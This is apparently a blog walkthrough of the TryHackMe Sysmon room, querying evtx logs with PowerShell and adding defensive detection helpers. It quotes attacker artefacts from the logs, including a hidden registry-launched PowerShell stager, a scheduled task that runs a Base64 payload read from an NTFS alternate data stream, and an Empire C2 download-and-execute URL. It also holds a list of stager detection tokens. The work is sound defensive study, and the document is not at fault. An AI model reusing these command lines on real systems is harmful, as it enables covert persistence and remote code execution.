TL;DR Walkthrough of the TryHackMe Sysmon room, part of the Cyber Defense pathway.
THM Walkthroughs:
A full list of our TryHackMe walkthroughs and cheatsheets is here.
Background
There are other good walkthroughs of the Sysmon room out there; this one, for example, was good.
However, they used Event Viewer instead of PowerShell. With a small evtx file such as the one TryHackMe provides for this room, one can get away with that approach. However, given live logs in even a small home lab environment, that tactic quickly becomes unworkable. That is why we used PowerShell to set the SACLs that define what gets logged, trigger the event, and then query the logs to pull meaningful data here.
We will start by running through the questions, our query to find the relevant data, and the answers.
It is quite helpful to keep a quick & dirty cheatsheet of Sysmon Event Ids handy while creating these queries. TryHackMe didn’t include one in the room and didn’t list all Event Ids, so I’ll put ours here.
Sysmon Event Id cheatsheet
+----+----------------------------------------+
| #  | Sysmon Event                           |
+----+----------------------------------------+
| 1  | Process creation                       |
| 3  | Network connection                     |
| 5  | Process terminated                     |
| 7  | Image loaded                           |
| 8  | CreateRemoteThread                     |
| 9  | RawAccessRead                          |
| 10 | ProcessAccess                          |
| 11 | FileCreate                             |
| 12 | RegistryEvent (Object create & delete) |
| 13 | RegistryEvent (Value Set)              |
| 14 | RegistryEvent (Key & Value Rename)     |
| 15 | FileCreateStreamHash                   |
| 22 | DNSEvent (DNS query)                   |
+----+----------------------------------------+
Important Admin Note
I downloaded the task files from TryHackMe and found the answers using them. The Message property of the events in the task files was blank.
If you query the evtx files on THM’s VM in the C:\Users\THM-Analyst\Desktop\Scenarios\Investigations folder then the Event Ids have data in their Message Property.
Hence I used the Properties below. I spot checked a couple of these and they work fine on THM’s VM’s files as well. You might just prefer to use the Message if you complete this room on THM’s VM.
Task 4 Cutting out the Noise
How many event ID 3 events are in C:\Users\THM-Analyst\Desktop\Scenarios\Practice\Filtering.evtx?
$Network_Events = Get-WinEvent -Path "C:\Users\THM-Analyst\Desktop\Scenarios\Practice\Filtering.evtx" | Where-Object {$_.Id -eq "3"}
$Network_Events.Count
73,591
What is the UTC time created of the first network event in C:\Users\THM-Analyst\Desktop\Scenarios\Practice\Filtering.evtx?
$LastOne = $Network_Events | Select-Object -Last 1
$LastOne.Properties[1].Value
2021-01-06 01:35:50.464
THM wants the UtcTime, not the TimeCreated.
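The queries above index into Properties[N], and the note on the task files explains why. The index layout differs per Event Id, so an added example (not from the original walkthrough) shows how to read the same Sysmon fields by name from the event XML instead, and how to let Get-WinEvent do the Id filtering. The helper name ConvertFrom-SysmonEvent is our own; the only path assumed is the room's Filtering.evtx.

```powershell
# Added example: read Sysmon EventData by field name instead of Properties[N].
# The XML carries each field's name (<Data Name="UtcTime">...</Data>), so the
# same code works for Event Id 1, 3, 10, 13 and so on without memorising indexes.
$EvtxPath = 'C:\Users\THM-Analyst\Desktop\Scenarios\Practice\Filtering.evtx'

function ConvertFrom-SysmonEvent {
    # Turns one EventLogRecord into a PSCustomObject with one property per EventData field.
    param(
        [Parameter(Mandatory, ValueFromPipeline)]
        [System.Diagnostics.Eventing.Reader.EventLogRecord]$Event
    )
    process {
        [xml]$Xml = $Event.ToXml()
        $Fields = [ordered]@{
            EventId     = $Event.Id
            TimeCreated = $Event.TimeCreated
        }
        foreach ($Data in $Xml.Event.EventData.Data) {
            $Fields[$Data.Name] = $Data.'#text'
        }
        [pscustomobject]$Fields
    }
}

# FilterHashtable lets the log reader filter on Id before any objects are built,
# which is far cheaper than piping every record through Where-Object.
# It accepts Path for offline .evtx files.
$NetworkEvents = Get-WinEvent -FilterHashtable @{ Path = $EvtxPath; Id = 3 } |
    ConvertFrom-SysmonEvent

"Event Id 3 count: $($NetworkEvents.Count)"

# Get-WinEvent returns newest first, which is why the walkthrough used Select-Object -Last 1.
# Sorting on the Sysmon UtcTime field removes that assumption entirely.
$First = $NetworkEvents | Sort-Object { [datetime]$_.UtcTime } | Select-Object -First 1
"First network connection (UtcTime): $($First.UtcTime)"
$First | Format-List Image, SourceIp, SourcePort, DestinationIp, DestinationPort, Protocol
```

Once events are objects with named fields, every later question in the room becomes a Where-Object on a readable property (for example, TargetObject -like '*svchost.exe*' rather than Properties[4]), and the same function runs unchanged against a live Microsoft-Windows-Sysmon/Operational log by swapping Path for LogName in the hashtable.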
Task 10 Practical Investigations
--- Investigation 1 ---
What is the full registry key of the USB device calling svchost.exe in Investigation 1?
We are looking for an Event Id 12, 13, or 14 event that references svchost.exe.
$Registry_Event = Get-WinEvent -Path .\Investigation-1.evtx | Where-Object {(($_.Id -eq "12") -or ($_.Id -eq "13") -or ($_.Id -eq "14")) -and ($_.Properties[4].Value -like "*svchost.exe*")} | Select-Object *
$Registry_Event.Properties[5]
HKLM\System\CurrentControlSet\Enum\WpdBusEnumRoot\UMB\2&37c186b&0&STORAGE#VOLUME#_??_USBSTOR#DISK&VEN_SANDISK&PROD_U3_CRUZER_MICRO&REV_8.01#4054910EF19005B3&0#\FriendlyName
What is the device name when being called by RawAccessRead in Investigation 1?
We are looking for an Event Id 9 event that references svchost.exe.
$Read_Event = Get-WinEvent -Path .\Investigation-1.evtx | Where-Object {($_.Id -eq "9") -and ($_.Properties.Value -like "*svchost.exe*")} | Select-Object *
($Read_Event | Select-Object -First 1).Properties[4].Value
\Device\HarddiskVolume3
What is the first exe the process executes in Investigation 1?
We are looking for the first Event Id 1 that happened after the Event Id 9 from the last question.
$Time = ($Read_Event | Select-Object -First 1).TimeCreated
(Get-WinEvent -Path .\Investigation-1.evtx | Where-Object {($_.Id -eq "1") -and ($_.TimeCreated -ge $Time)} | Select-Object -Last 1).Properties[8].Value
rundll32.exe
--- Investigation 2 ---
What is the full path of the payload in Investigation 2?
We took an educated guess that the payload was an hta file as THM used them for reverse shells previously.
(Get-WinEvent -Path .\Investigation-2.evtx | Where-Object {($_.Id -eq "1") -and ($_.Properties.Value -like "*hta*")}).Properties.Value
(Get-WinEvent -Path .\Investigation-2.evtx | Where-Object {($_.Id -eq "1") -and ($_.Properties.Value -like "*hta*")}).Properties.Value[9]
C:\Users\IEUser\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\S97WTYG7\update.hta
What is the full path of the file the payload masked itself as in Investigation 2?
(Get-WinEvent -Path .\Investigation-2.evtx | Where-Object {($_.Id -eq "1") -and ($_.Properties.Value -like "*hta*")}).Properties[20].Value
C:\Users\IEUser\Downloads\update.html
What signed binary executed the payload in Investigation 2?
We already found this in the first question's query; it's the legitimate executable that opened the *.hta file.
(Get-WinEvent -Path .\Investigation-2.evtx | Where-Object {($_.Id -eq "1") -and ($_.Properties.Value -like "*hta*")}).Properties[4].Value
C:\Windows\System32\mshta.exe
What is the IP of the adversary in Investigation 2?
(Get-WinEvent -Path .\Investigation-2.evtx | Where-Object {$_.Id -eq "3"}).Properties[14].Value
10.0.2.18
What back connect port is used in Investigation 2?
To pull just the port, use index [16]:
(Get-WinEvent -Path .\Investigation-2.evtx | Where-Object {$_.Id -eq "3"}).Properties.Value[16]
4443
--- Investigation 3.1 ---
What is the IP of the suspected adversary in Investigation 3.1?
There are only three Event Id 3 instances in this evtx file, and one can tell at a glance that it's the attacker and the compromised system talking back and forth. We can pull the specific data point of the attacker's IP via:
(Get-WinEvent -Path .\Investigation-3.1.evtx | Where-Object {$_.Id -eq "3"} | Select-Object -First 1).Properties.Value[13]
172.30.1.253
What is the hostname of the affected endpoint in Investigation 3.1?
(Get-WinEvent -Path .\Investigation-3.1.evtx | Where-Object {$_.Id -eq "3"} | Select-Object -First 1).Properties.Value[9]
DESKTOP-O153T4R.localdomain
What is the hostname of the C2 server connecting to the endpoint in Investigation 3.1?
(Get-WinEvent -Path .\Investigation-3.1.evtx | Where-Object {$_.Id -eq "3"} | Select-Object -First 1).Properties.Value[14]
empirec2
Where in the registry was the payload stored in Investigation 3.1?
There are only two Event Id 13 entries in the evtx, and one will notice at a glance that the first one runs the second one.
(Get-WinEvent -Path .\Investigation-3.1.evtx | Where-Object {$_.Id -eq "13"} | Select-Object -Last 1).Properties.Value[5]
HKLM\SOFTWARE\Microsoft\Network\debug
What PowerShell launch code was used to launch the payload in Investigation 3.1?
(Get-WinEvent -Path .\Investigation-3.1.evtx | Where-Object {$_.Id -eq "13"} | Select-Object -First 1).Properties.Value[6]
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "$x=$((gp HKLM:Software\Microsoft\Network debug).debug);start -Win Hidden -A \"-enc $x\" powershell";exit;
Notice that ‘gp’ is an alias for ‘Get-ItemProperty’, in other words it is pulling a value from HKLM:Software\Microsoft\Network\debug and executing it in a hidden PowerShell window. This is obviously suspicious. We will return to this after the questions are all answered.
--- Investigation 3.2 ---
What is the IP of the adversary in Investigation 3.2?
$Events = Get-WinEvent -Path .\Investigation-3.2.evtx | Where-Object {$_.Id -eq "3"}
$Events[0].Properties
$Events[0].Properties[13].Value
172.168.103.188
What is the full path of the payload location in Investigation 3.2?
(Get-WinEvent -Path .\Investigation-3.2.evtx | Where-Object {($_.Id -eq "1") -and ($_.Properties.Value -like "*schtasks.exe*")}).Properties.Value[8]
"C:\WINDOWS\system32\schtasks.exe" /Create /F /SC DAILY /ST 09:00 /TN Updater /TR "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NonI -W hidden -c \"IEX ([Text.Encoding]::UNICODE.GetString([Convert]::FromBase64String($(cmd /c ''more < c:\users\q\AppData:blah.txt'''))))\""
We're looking for just the path to the payload itself, so copy/paste the file path that cmd.exe reads and whose contents it passes to PowerShell to execute. On a side note, it's a nifty obfuscation technique: AppData:blah.txt is an NTFS alternate data stream attached to the AppData folder, so the payload never shows up as an ordinary file in a directory listing (Sysmon Event Id 15, FileCreateStreamHash, exists to log exactly this kind of stream creation).
c:\users\q\AppData:blah.txt
What was the full command used to create the scheduled task in Investigation 3.2?
We just copy/pasted the path from it above, so the answer to this one is simply the full scheduled task.
"C:\WINDOWS\system32\schtasks.exe" /Create /F /SC DAILY /ST 09:00 /TN Updater /TR "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NonI -W hidden -c \"IEX ([Text.Encoding]::UNICODE.GetString([Convert]::FromBase64String($(cmd /c ''more < c:\users\q\AppData:blah.txt'''))))\""
What process was accessed by schtasks.exe that would be considered suspicious behavior in Investigation 3.2?
We are looking for Event Id 10 ProcessAccess and schtasks.
(Get-WinEvent -Path .\Investigation-3.2.evtx | Where-Object {($_.Id -eq "10") -and ($_.Properties.Value -like "*schtasks.exe*")}).Properties.Value[4]
C:\WINDOWS\system32\lsass.exe
TryHackMe only wants the process, not the full path so:
lsass.exe
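The last question is the one worth turning into a standing detection: schtasks.exe has no business opening a handle to lsass.exe, and the same Event Id 10 pattern is how credential-dumping tools show up. Below is an added example (our code, not TryHackMe's) that triages every ProcessAccess event in an evtx against lsass.exe, drops the handful of processes that legitimately open it, and reports the access mask that was granted. The function name Find-SuspiciousLsassAccess and the allow-list are our own lab assumptions; tune the list to your own baseline.

```powershell
# Added example: flag Sysmon Event Id 10 (ProcessAccess) records where something
# outside a known baseline opened a handle on lsass.exe. Fields are read by name
# from the event XML so the code does not depend on Properties[N] indexes.

# Hypothetical lab allow-list of processes that routinely open lsass. Build your
# own from a clean system's Event Id 10 history before relying on it.
$KnownLsassOpeners = @(
    'C:\Windows\System32\csrss.exe',
    'C:\Windows\System32\wininit.exe',
    'C:\Windows\System32\svchost.exe',
    'C:\Windows\System32\MsMpEng.exe'
)

function Find-SuspiciousLsassAccess {
    param(
        [Parameter(Mandatory)][string]$Path,
        [string[]]$AllowedSources = $KnownLsassOpeners
    )
    Get-WinEvent -FilterHashtable @{ Path = $Path; Id = 10 } | ForEach-Object {
        [xml]$Xml = $_.ToXml()
        $Data = @{}
        foreach ($D in $Xml.Event.EventData.Data) { $Data[$D.Name] = $D.'#text' }

        # Only handles opened on lsass are interesting here.
        if ($Data['TargetImage'] -notlike '*\lsass.exe') { return }
        # -contains is case-insensitive, so C:\WINDOWS\system32\... still matches.
        if ($AllowedSources -contains $Data['SourceImage']) { return }

        [pscustomobject]@{
            UtcTime       = $Data['UtcTime']
            SourceImage   = $Data['SourceImage']
            TargetImage   = $Data['TargetImage']
            # 0x1010 = PROCESS_VM_READ | PROCESS_QUERY_LIMITED_INFORMATION, the
            # minimum a memory reader needs; 0x1FFFFF is full access.
            GrantedAccess = $Data['GrantedAccess']
            CallTrace     = $Data['CallTrace']
        }
    }
}

Find-SuspiciousLsassAccess -Path '.\Investigation-3.2.evtx' | Format-Table -AutoSize
```

GrantedAccess is the field that separates curiosity from theft: a process that only queries lsass gets 0x1000 or similar, whereas anything carrying PROCESS_VM_READ (bit 0x10) can copy credential material out of its memory. CallTrace, when present, shows which DLLs made the call and is a quick tell for injected or unsigned code.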
--- Investigation 4 ---
What is the IP of the adversary in Investigation 4?
$Network_Events = Get-WinEvent -Path .\Investigation-4.evtx | Where-Object {$_.Id -eq "3"}
$Network_Events[3].Properties
$Network_Events[3].Properties[13].Value
172.30.1.253
What port is the adversary operating on in Investigation 4?
$Network_Events[3].Properties[10].Value
80
What C2 is the adversary utilizing in Investigation 4?
$Network_Events[2].Properties[16].Value
empire
Base64 PowerShell commands
Remember the last question in Investigation 3.1, where the command pulls a value from the registry and executes it in PowerShell?
TryHackMe didn’t ask about the command itself but I was curious.
$Registry_Events = Get-WinEvent -Path .\Investigation-3.1.evtx | Where-Object {$_.Id -eq "13"}
$Base64 = $Registry_Events[1].Properties.Value[6]
$DecodedCommand = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String("$Base64"))
$DecodedCommand
IEX is an alias for Invoke-Expression, which runs a string as a command. If you Google “Invoke-Expression” the first thing that comes up is about using it to obfuscate PowerShell execution flow.
I broke the one-liner up into if/else statements, multiple commands, etc. and made some sense of it. It appears to create a connection to http://empire2:80/admin/get.php using a hard-coded cookie value, download something, and then pass it to Invoke-Expression.
Microsoft Defender wasn’t fooled by the way.
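The manual decode above works for one known event. As an added example (our code, not the room's), the function below generalises it: it walks every Event Id 1 command line and Event Id 13 registry value in an evtx, pulls out anything that looks like a Base64 blob (whether it follows -enc, -EncodedCommand, or sits bare in a registry value as in Investigation 3.1), decodes it as UTF-16LE the same way -EncodedCommand does, and flags the tokens a stager like this one leaves behind. The function name Find-EncodedPowerShell, the regex and the token list are our assumptions.

```powershell
# Added example: locate, decode and triage Base64-encoded PowerShell in Sysmon logs.
function Find-EncodedPowerShell {
    param([Parameter(Mandatory)][string]$Path)

    # Tokens that commonly appear in download-and-execute stagers once decoded.
    $SuspiciousTokens = 'IEX', 'Invoke-Expression', 'DownloadString', 'DownloadData',
                        'FromBase64String', 'Net.WebClient', 'Hidden', 'bypass'
    # Matches "-enc <blob>", "-EncodedCommand <blob>", or a bare run of 40+ Base64 chars.
    $Base64Pattern = '(?i)(?:-e(?:nc(?:odedcommand)?)?\s+)?([A-Za-z0-9+/]{40,}={0,2})'

    Get-WinEvent -FilterHashtable @{ Path = $Path; Id = 1, 13 } | ForEach-Object {
        $Record = $_
        [xml]$Xml = $Record.ToXml()
        $Data = @{}
        foreach ($D in $Xml.Event.EventData.Data) { $Data[$D.Name] = $D.'#text' }

        # Event 1 carries the command line; Event 13 carries the value written (Details).
        if ($Record.Id -eq 1) { $Text = $Data['CommandLine']; $Source = $Data['Image'] }
        else                  { $Text = $Data['Details'];     $Source = $Data['TargetObject'] }
        if (-not $Text) { return }

        foreach ($Match in [regex]::Matches($Text, $Base64Pattern)) {
            $Blob = $Match.Groups[1].Value
            try {
                # -EncodedCommand expects UTF-16LE, which is what [Text.Encoding]::Unicode is.
                $Decoded = [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Blob))
            } catch { continue }   # looked like Base64 but was not (e.g. a hex hash)
            # A real script is printable text; skip blobs that decode to binary noise.
            if ($Decoded -match '[^\x09\x0A\x0D\x20-\x7E]') { continue }

            $Hits = $SuspiciousTokens | Where-Object { $Decoded -match [regex]::Escape($_) }
            [pscustomobject]@{
                EventId = $Record.Id
                UtcTime = $Data['UtcTime']
                Source  = $Source
                Flags   = ($Hits -join ', ')
                Decoded = $Decoded.Substring(0, [Math]::Min(200, $Decoded.Length))
            }
        }
    }
}

Find-EncodedPowerShell -Path '.\Investigation-3.1.evtx' | Format-List
```

Run against Investigation-3.1.evtx this surfaces the registry value under HKLM\SOFTWARE\Microsoft\Network\debug with IEX and Net.WebClient flagged, which is the same stager decoded by hand above. The printable-text check matters in practice: command lines are full of long hex strings (hashes, GUIDs) that pass a naive Base64 regex, and without it the report fills with garbage.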
Summary
Together with the Windows Event Logs room this was really good practice at analyzing logs and parsing data in general.
If this walkthrough helps anyone else then that’s a bonus, but I mostly took these notes so I could refer back to them rather than memorizing how to query Sysmon logs.
We covered the attacker TTP of using Base64 encoded commands briefly before here. I'm not sure why running Base64 commands is even a feature in Windows, but then I don't know why automatically downloading Office templates from the Internet was either. Needless to say, your SIEM should be screening for Base64 and obfuscated commands in general.
References
Good Sysmon writeup, uses Event Viewer instead of PowerShell: https://medium.com/@laupeiip/tryhackme-sysmon-write-up-50a7043c86cf
CredentialCache.DefaultNetworkCredentials Property: https://learn.microsoft.com/en-us/dotnet/api/system.net.credentialcache.defaultnetworkcredentials?view=net-7.0
Sysmon Event Id list: https://learn.microsoft.com/en-us/sysinternals/downloads/sysmon
Get-ItemProperty: https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-itemproperty?view=powershell-7.3
Attacker TTPs RE obfuscating Invoke-Expression: https://www.securonix.com/blog/hiding-the-powershell-execution-flow/#:~:text=%E2%80%9CInvoke%20expressions%E2%80%9D%20(IEX),both%20local%20and%20remote%20payloads.
Invoke-Expression: https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/invoke-expression?view=powershell-7.3
Macro injection from a remote template: https://www.ired.team/offensive-security/initial-access/phishing-with-ms-office/inject-macros-from-a-remote-dotm-template-docx-with-macros
ASCII Table Creator: https://ozh.github.io/ascii-tables/